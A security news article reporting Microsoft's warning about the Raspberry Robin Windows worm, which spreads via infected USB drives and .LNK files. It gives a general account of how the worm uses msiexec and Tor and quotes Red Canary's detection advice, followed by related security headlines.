Microsoft Detects Raspberry Robin Windows Worm in Hundreds of Enterprise Networks
Microsoft has warned customers about a new high-risk worm called “Raspberry Robin” that is infecting Windows PCs. The software giant has privately informed some Microsoft Defender for Endpoint users that the malware has been discovered in hundreds of enterprise networks across various industries (via Bleeping Computer).
The Red Canary cybersecurity researchers first discovered Raspberry Robin in September last year. The researchers found that the worm spreads to new Windows machines via infected USB that contains a .LNK file. Once the user clicks on the file, the malware uses the command prompt to create a “msiexec” process and runs another malicious file on the compromised PC.
Additionally, the worm establishes a connection with its command and control (C2) server and uses Windows utilities to install additional malicious payloads on the victim’s system. The DLL files then attempt to communicate with Tor nodes.
Microsoft explained in its security advisory that the Raspberry Robin worm has been connecting to several IP addresses on the TOR network. However, the attackers have yet to exploit this vulnerability in order to deploy ransomware or steal sensitive data from vulnerable Windows devices.
Microsoft categorizes Raspberry Robin as a high-risk campaign
Microsoft has classified Raspberry Robin as a high-risk campaign because it could allow the threat actors to infect entire corporate networks. The researchers have detailed some indicators to help IT admins detect the Raspberry Robin malware.
“To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not,” Red Canary researchers explained.
The security researchers have also advised that customers should not connect suspicious USB devices to their Windows PCs in order to prevent Raspberry Robin infections. If you’re interested, we invite you to check out Red Canary’s report, which provides detailed insights into how the worm works.
More in Security
Inspire 2022: Microsoft Launches Cloud for Sovereignty to Protect Government Customers
Jul 19, 2022 | Rabia Noureen
DHS Review Board Warns Log4j Flaw to Affect Vulnerable Systems Until At Least 2032
Jul 18, 2022 | Rabia Noureen
Cloudflare Issues Advisory About Mantis Botnet Behind the Most Powerful DDoS Attack
Jul 15, 2022 | Rabia Noureen
Microsoft Defender for Business Gets Protections for Windows and Linux Servers
Jul 14, 2022 | Rabia Noureen
Microsoft Warns About New Large-Scale Phishing Campaign Bypassing MFA
Jul 13, 2022 | Rabia Noureen
Microsoft Defender for IoT Protects Unmanaged Enterprise IoT Devices
Jul 12, 2022 | Rabia Noureen
Most popular on petri